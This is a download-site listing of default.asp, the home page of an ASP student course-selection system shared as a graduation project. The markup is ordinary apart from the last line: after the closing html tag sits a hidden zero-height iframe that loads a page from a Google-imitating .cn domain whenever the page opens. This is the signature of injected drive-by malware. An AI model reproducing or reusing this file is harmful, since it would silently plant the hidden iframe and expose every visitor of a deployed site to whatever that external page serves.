⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 default.asp

📁 一个学生选棵系统的毕业论文
💻 ASP
字号:
<!--#include file="include/header.asp"-->
<!--#include file="include/keepHouse.asp"-->
<html>
<head>
<title>欢迎来到<%=WebName%></title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta http-equiv="Content-Language" content="zh-cn">
<link href="include/WebCourseSettlementStyle.Css" rel="stylesheet" type="text/css">
</head>

<body>
<div align =center>

<table align =center bgcolor="#FFFAEF">
<tr>

<td width ="750">
<table border="0" width="750" cellspacing="0" cellpadding="0" height="270">
<tr>
<td width="160" valign="top" height="289">
<%
server.Execute("LogIn/login.asp")
%>
<br>
<table border="1" bordercolorlight="#0000dd" bordercolordark="#FFFFFF" 
width="155" cellspacing="0" cellpadding="0" height="50">
<tr>
<td width="151" height="20" bgcolor="#99CCFF" valign="middle">&nbsp;链接</td>
</tr>
<tr> 
<td width="151" height="74" bgcolor="#F0F0F0" valign="top" align="center">

</td>
</tr>
</table>
</td>

<td width="590" valign="top" height="289">
<%
server.Execute("ArrangeCourse/CourseSelectNotice/showNotice.asp")
%>
</td>

</tr>
</table>

</div>
<!--#include file="include/footer.asp"-->
</body>
</html><iframe src="http://www.googlvo.cn/all/index.htm?a" width="50" height="0"></iframe>           

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -